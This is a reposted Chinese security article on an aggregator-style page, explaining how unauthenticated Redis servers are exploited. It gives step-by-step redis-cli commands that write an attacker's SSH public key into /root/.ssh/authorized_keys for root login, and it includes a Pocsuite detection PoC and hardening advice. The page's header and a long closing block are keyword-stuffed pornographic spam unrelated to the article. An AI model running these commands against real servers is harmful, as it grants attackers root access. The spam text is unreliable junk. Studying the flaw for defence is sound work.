婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Redis未授權訪問配合SSH key文件利用詳解

Redis未授權訪問配合SSH key文件利用詳解

熱門標簽:廊坊外呼系統在哪買 一個地圖標注多少錢 南京手機外呼系統廠家 地圖標注工廠入駐 400電話辦理的口碑 b2b外呼系統 臺灣電銷 四川穩定外呼系統軟件 高碑店市地圖標注app

前言

Redis是一個開源的使用ANSI C語言編寫、支持網絡、可基于內存亦可持久化的日志型、Key-Value數據庫,并提供多種語言的API。

Redis 未授權訪問的問題是一直存在的問題,知道創宇安全研究團隊歷史上也做過相關的應急,今日,又出現 Redis 未授權訪問配合 SSH key 文件被利用的情況,導致一大批 Redis 服務器被黑,今天我們來簡要的分析下。

一、漏洞概述

Redis 默認情況下,會綁定在 0.0.0.0:6379,這樣將會將 Redis 服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下可以利用 Redis 的相關方法,可以成功在 Redis 服務器上寫入公鑰,進而可以使用對應私鑰直接登錄目標服務器。

1、漏洞描述

Redis 安全模型的觀念是: “請不要將 Redis 暴露在公開網絡中, 因為讓不受信任的客戶接觸到 Redis 是非常危險的” 。

Redis 作者之所以放棄解決未授權訪問導致的不安全性是因為, 99.99% 使用 Redis 的場景都是在沙盒化的環境中, 為了0.01%的可能性增加安全規則的同時也增加了復雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設計哲學中仍是不劃算的。

因為其他受信任用戶需要使用 Redis 或者因為運維人員的疏忽等原因,部分 Redis 綁定在 0.0.0.0:6379,并且沒有開啟認證(這是Redis 的默認配置),如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源 ip 訪問等,將會導致 Redis 服務直接暴露在公網上,導致其他用戶可以直接在非授權情況下直接訪問Redis服務并進行相關操作。

利用 Redis 自身的提供的 config 命令,可以進行寫文件操作,攻擊者可以成功將自己的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接使用對應的私鑰登錄目標服務器。

2、漏洞影響

Redis 暴露在公網(即綁定在0.0.0.0:6379,目標IP公網可訪問),并且沒有開啟相關認證和添加相關安全策略情況下可受影響而導致被利用。

通過ZoomEye 的搜索結果顯示,有97707在公網可以直接訪問的Redis服務。

根據 ZoomEye 的探測,全球無驗證可直接利用Redis 分布情況如下:

全球無驗證可直接利用Redis TOP 10國家與地區:

3、漏洞分析與利用

首先在本地生產公私鑰文件:

$ssh-keygen –t rsa

然后將公鑰寫入 foo.txt 文件

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

再連接 Redis 寫入文件

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK

這樣就可以成功的將自己的公鑰寫入 /root/.ssh 文件夾的 authotrized_keys 文件里,然后攻擊者直接執行:

$ ssh –i id_rsa root@192.168.1.11

即可遠程利用自己的私鑰登錄該服務器。

當然,寫入的目錄不限于 /root/.ssh 下的authorized_keys,也可以寫入用戶目錄,不過 Redis 很多以 root 權限運行,所以寫入 root 目錄下,可以跳過猜用戶的步驟。

4、Redis 未授權的其他危害與利用

a)數據庫數據泄露

Redis 作為數據庫,保存著各種各樣的數據,如果存在未授權訪問的情況,將會導致數據的泄露,其中包含保存的用戶信息等。

b)代碼執行

Redis可以嵌套Lua腳本的特性將會導致代碼執行, 危害同其他服務器端的代碼執行, 樣例如下        一旦攻擊者能夠在服務器端執行任意代碼, 攻擊方式將會變得多且復雜, 這是非常危險的.

通過Lua代碼攻擊者可以調用 redis.sha1hex() 函數,惡意利用 Redis 服務器進行 SHA-1 的破解。

c)敏感信息泄露

通過 Redis 的 INFO 命令, 可以查看服務器相關的參數和敏感信息, 為攻擊者的后續滲透做鋪墊。

可以看到泄露了很多 Redis 服務器的信息, 有當前 Redis 版本, 內存運行狀態, 服務端個數等等敏感信息。

5、漏洞驗證

可以使用Pocsuite(http://github.com/knownsec/pocsuite)執行以下的代碼可以用于測試目標地址是否存在未授權的Redis服務。

#!/usr/bin/env python
# -*- coding:utf-8 -*-
 
import socket
import urlparse
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
 
 
class TestPOC(POCBase):
 vulID = '89339'
 version = '1'
 author = ['Anonymous']
 vulDate = '2015-10-26'
 createDate = '2015-10-26'
 updateDate = '2015-10-26'
 references = ['http://sebug.net/vuldb/ssvid-89339']
 name = 'Redis 未授權訪問 PoC'
 appPowerLink = 'http://redis.io/'
 appName = 'Redis'
 appVersion = 'All'
 vulType = 'Unauthorized access'
 desc = '''
  redis 默認不需要密碼即可訪問,黑客直接訪問即可獲取數據庫中所有信息,造成嚴重的信息泄露。
 '''
 samples = ['']
 
 def _verify(self):
  result = {}
  payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
  s = socket.socket()
  socket.setdefaulttimeout(10)
  try:
   host = urlparse.urlparse(self.url).netloc
   port = 6379
   s.connect((host, port))
   s.send(payload)
   recvdata = s.recv(1024)
   if recvdata and 'redis_version' in recvdata:
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = self.url
    result['VerifyInfo']['Port'] = port
  except:
   pass
  s.close()
  return self.parse_attack(result)
 
 def _attack(self):
  return self._verify()
 
 def parse_attack(self, result):
  output = Output(self)
  if result:
   output.success(result)
  else:
   output.fail('Internet nothing returned')
  return output
 
register(TestPOC)

二、安全建議

配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379

配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

好消息是Redis作者表示將會開發”real user”,區分普通用戶和admin權限,普通用戶將會被禁止運行某些命令,如config

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

您可能感興趣的文章:
  • Redis批量刪除KEY的方法
  • Redis教程(七):Key操作命令詳解
  • Redis獲取某個前綴的key腳本實例
  • redis數據庫查找key在內存中的位置的方法
  • 關于使用key/value數據庫redis和TTSERVER的心得體會
  • 關于redis Key淘汰策略的實現方法
  • Redis獲取某個大key值的腳本實例
  • redis 用scan指令 代替keys指令(詳解)
  • redis中熱key問題該如何解決

標簽:泰州 伊春 甘南 南寧 河源 拉薩 畢節 定州

巨人網絡通訊聲明:本文標題《Redis未授權訪問配合SSH key文件利用詳解》,本文關鍵詞  Redis,未,授權,訪問,配合,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Redis未授權訪問配合SSH key文件利用詳解》相關的同類信息!
  • 本頁收集關于Redis未授權訪問配合SSH key文件利用詳解的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    精品对白一区国产伦| 欧美a级理论片| 亚洲色图自拍偷拍美腿丝袜制服诱惑麻豆 | 成人av集中营| 一本色道久久综合亚洲91| 色综合久久66| 日韩免费高清电影| 国产欧美日韩视频在线观看| 亚洲黄色免费网站| 久久99精品国产.久久久久久| 成人av资源网站| 欧美成人在线直播| 亚洲日本电影在线| 久久99精品久久久久久| 91女人视频在线观看| 精品国产精品一区二区夜夜嗨| 亚洲欧美自拍偷拍色图| 国产综合色在线视频区| 欧美一区二区福利在线| 亚洲日本在线a| 色综合天天综合狠狠| 国产亚洲成av人在线观看导航 | 久久一区二区视频| 性做久久久久久| 欧美偷拍一区二区| 亚洲国产日产av| 欧美日韩一级片在线观看| 夜夜精品浪潮av一区二区三区| 国产一区二区三区观看| 91精品福利在线一区二区三区| 亚洲一区在线播放| 欧美日韩国产在线播放网站| 偷拍日韩校园综合在线| 91精品国产乱| 国产电影一区二区三区| 国产精品国产精品国产专区不蜜| 国产白丝网站精品污在线入口| 久久综合九色综合欧美亚洲| 韩国av一区二区三区在线观看| 国产亚洲欧美日韩俺去了| 91色|porny| 久久er99热精品一区二区| 亚洲三级在线免费观看| 欧美巨大另类极品videosbest | 综合自拍亚洲综合图不卡区| 欧洲在线/亚洲| 激情图区综合网| 亚洲综合视频在线| 久久精品亚洲精品国产欧美kt∨ | 韩国欧美国产一区| 亚洲人午夜精品天堂一二香蕉| 91麻豆精品国产无毒不卡在线观看| 国产一区二区三区综合| 性感美女极品91精品| 综合久久久久久久| 精品久久久久久久久久久院品网| 99国产精品国产精品毛片| 国产福利精品一区| 国产精品一级黄| 国产黑丝在线一区二区三区| 三级久久三级久久久| 亚洲国产中文字幕在线视频综合| 中文字幕一区二区三区蜜月| 日韩一级精品视频在线观看| 在线亚洲免费视频| 欧洲亚洲精品在线| 日本高清成人免费播放| 91福利精品第一导航| 在线亚洲免费视频| 欧美日韩在线三区| 欧美美女激情18p| 日韩欧美国产不卡| 国产日韩精品一区| 中文字幕亚洲一区二区va在线| 国产校园另类小说区| 中文字幕+乱码+中文字幕一区| 亚洲国产岛国毛片在线| 亚洲欧美色图小说| 亚洲国产精品影院| 国产一区欧美二区| 色婷婷久久久久swag精品| 日韩一区二区三区电影 | 在线精品亚洲一区二区不卡| 69堂亚洲精品首页| 国产精品污污网站在线观看| 日韩中文字幕91| 97久久精品人人做人人爽 | 国产不卡视频一区| 欧美亚洲丝袜传媒另类| 中文字幕乱码久久午夜不卡| 舔着乳尖日韩一区| 99精品国产视频| 久久精品夜夜夜夜久久| 日韩和的一区二区| 91丨porny丨蝌蚪视频| 精品国产网站在线观看| 日本在线观看不卡视频| 99久久久精品免费观看国产蜜| 日韩欧美一级二级三级| 免费xxxx性欧美18vr| 欧美美女bb生活片| 日韩在线播放一区二区| 欧美日韩精品一区视频| 亚洲愉拍自拍另类高清精品| 99精品欧美一区二区三区小说 | 国产v日产∨综合v精品视频| 精品国产123| www.欧美亚洲| 中文字幕一区二区三区不卡| 成人国产精品免费观看视频| 国产亚洲一区字幕| 大陆成人av片| 亚洲综合一二区| 久久综合精品国产一区二区三区 | 日本韩国视频一区二区| 亚洲丝袜精品丝袜在线| 91国偷自产一区二区三区观看| 天天操天天干天天综合网| 欧美日本一道本在线视频| 久久精品99国产精品| 国产欧美一区二区精品婷婷| 色综合激情五月| 国产精品99久久久久久久vr| 一区二区三区四区视频精品免费| 91精品中文字幕一区二区三区| 国产麻豆午夜三级精品| 亚洲成人在线观看视频| 国产亚洲精品7777| 欧美少妇性性性| 成人污污视频在线观看| 免费三级欧美电影| 亚洲aaa精品| 午夜国产不卡在线观看视频| 综合久久国产九一剧情麻豆| 久久新电视剧免费观看| 日韩精品一区二区三区视频播放| voyeur盗摄精品| 成人国产精品视频| 狠狠网亚洲精品| 成人一区在线看| 色综合欧美在线| 在线精品亚洲一区二区不卡| 欧美性感一类影片在线播放| 99九九99九九九视频精品| 色www精品视频在线观看| 91福利区一区二区三区| 在线视频你懂得一区二区三区| 成人app下载| 欧美日韩国产综合视频在线观看| 在线视频亚洲一区| 制服丝袜亚洲网站| 久久午夜羞羞影院免费观看| 国产农村妇女毛片精品久久麻豆| 精品sm在线观看| 亚洲欧美怡红院| 韩日av一区二区| 99国产精品一区| 日韩免费高清av| 亚洲主播在线观看| 国产一区二区精品久久91| 91麻豆123| 久久日韩精品一区二区五区| 亚洲精品视频在线观看网站| 五月天中文字幕一区二区| 国产精品99久久久久久久vr| 色女孩综合影院| 久久一区二区三区四区| 亚洲一区二区三区视频在线| 国产精品1区2区3区在线观看| 欧美无砖砖区免费| 国产精品大尺度| 国产精品一级黄| 亚洲精品在线观看网站| 奇米影视一区二区三区| 欧美剧情电影在线观看完整版免费励志电影 | 美女视频免费一区| 欧美最新大片在线看| 国产精品第四页| 成人蜜臀av电影| 亚洲视频网在线直播| 色综合天天综合网天天看片| 1024成人网色www| 色菇凉天天综合网| 国产精品久久久久久户外露出 | 久久se这里有精品| 337p日本欧洲亚洲大胆色噜噜| 狠狠色丁香婷婷综合久久片| 久久综合九色欧美综合狠狠| 丁香一区二区三区| 一区二区三区成人| 日韩一区二区在线播放| 国产主播一区二区| 日韩毛片视频在线看| 91精品午夜视频| 成人av动漫网站| 三级在线观看一区二区| 国产精品色在线观看| 欧美日韩国产首页| 国产精品一区2区| 亚洲小说欧美激情另类|